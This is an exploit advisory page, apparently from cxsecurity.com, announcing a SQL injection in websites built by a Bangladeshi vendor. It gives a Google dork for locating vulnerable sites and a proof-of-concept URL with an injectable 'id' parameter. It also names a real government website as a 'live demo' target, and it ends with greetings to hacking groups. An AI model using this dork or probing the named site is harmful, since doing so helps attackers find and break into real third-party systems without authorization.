Powered by CORPORATED IT SQL Injection

2017.09.03
Credit: kirin
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

::::========::::: # Exploit Title: Powered by CORPORATED IT SQL INJECTION # Google Dork: intext:"powered by CORPORATE IT" inurl:php?id= # Exploit Author: kirin ( Hexac0de Family ) # Vendor Homepage: http://citl.com.bd/ # Tested on: Linux ::::========::::: POC : http://www.target.com/contactus.php?id=[SQLI] Live demo : http://www.bpc.gov.bd/contactus.php?id=1 Greetz to : ::. ====== .:: > Hexac0de Family > Sec7or Team > Esechax0r > Mindless_injector > Kashmiri_wolf


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top